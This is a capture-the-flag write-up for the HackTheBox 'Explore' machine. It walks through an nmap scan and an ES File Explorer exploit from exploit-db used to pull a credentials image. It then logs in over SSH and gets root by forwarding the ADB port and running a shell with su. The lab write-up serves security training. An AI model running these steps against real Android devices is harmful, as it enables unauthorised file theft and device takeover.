HackTheBox: Explore Writeups

Initial Foothold

As usual, i started with network scanning using nmap.

sudo nmap -p- -A 10.10.10.247     
                                                
Not shown: 998 closed ports
PORT     STATE    SERVICE VERSION
2PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-server-header: ES Name Response Server
|_http-title: Site doesn't have a title (text/html).
42855/tcp open     unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 22 Aug 2021 09:57:34 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest:
|     HTTP/1.1 412 Precondition Failed
|     Date: Sun, 22 Aug 2021 09:57:34 GMT
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.0 501 Not Implemented
|     Date: Sun, 22 Aug 2021 09:57:40 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 22 Aug 2021 09:57:57 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 22 Aug 2021 09:57:40 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 22 Aug 2021 09:57:57 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 22 Aug 2021 09:57:58 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ??random1random2random3random4
|   TerminalServerCookie:
|     HTTP/1.0 400 Bad Request
|     Date: Sun, 22 Aug 2021 09:57:58 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|_    Cookie: mstshash=nmap
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
Network Distance: 2 hops
TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   300.71 ms 10.10.14.1
2   301.27 ms 10.10.10.247

Port 59777 have a known vulnerability, the exploit also available on exploit-db

https://www.exploit-db.com/exploits/50070

Exploiting User

Using listPics command, we got interesting file

We can read that interesting file using getFile command

python 50070.py getFile explore.htb /storage/emulated/0/DCIM/creds.jpg

user : kristi
pass : Kr1sT!5h@Rp3xPl0r3!

we can use previous credentials to login with ssh.

user flag located at /sdcard/user.txt

Privilege Escalation

ADB Commands

Following from that article, if the adb just can be accessed from localhost only, we must doing port-forwarding

ssh kristi@explore.htb -L 5555:127.0.0.1:5555 -p 2222
# on other terminal
adb connect losalhost:5555
adb -s localhost:5555 shell
su

the root flag located at /data/root.txt